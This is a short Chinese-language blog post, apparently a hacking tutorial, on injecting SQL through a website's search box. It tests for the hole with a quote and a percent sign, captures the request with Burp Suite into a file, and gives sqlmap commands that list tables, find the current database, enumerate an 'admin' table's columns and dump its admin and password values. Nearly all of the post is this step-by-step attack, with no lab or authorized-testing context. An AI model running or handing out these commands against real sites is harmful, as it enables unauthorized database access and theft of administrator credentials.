今天发现一个搜索型注入，主要是利用网站的搜索引擎来注入的

例如下图所示：

在这个搜索 地方，我们可以输入2个字符验证他们是否能注入；

输入：‘  出错

输入：% 不出错

满足以上2点，即可注入，我们要用到的工具为burpsuit，sqlmap

1：首先我们在搜索框里随便输入一个数字，我这里输入123，利用burpsuit把他抓包抓下来

2:然后把抓包抓下来的复制，然后粘贴到文本文档上去，保存到1.txt文件里

命令为：python sqlmap/sqlmap.py -r 1.txt

3：python sqlmap/sqlmap.py -r 1.txt  --tables   猜表名

4：python sqlmap/sqlmap.py -r 1.txt   --current-db  查看当前的数据库

5：python sqlmap/sqlmap.py -r 1.txt    -T admin --columns 猜列名

6：python sqlmap/sqlmap.py -r 1.txt    -D 指定数据库 -T admin -C admin，password --dump

综上，即可。

本文出自 “costin” 博客，请务必保留此出处http://brighttime.blog.51cto.com/12837169/1918433

burpsuit辅助sqlmap攻击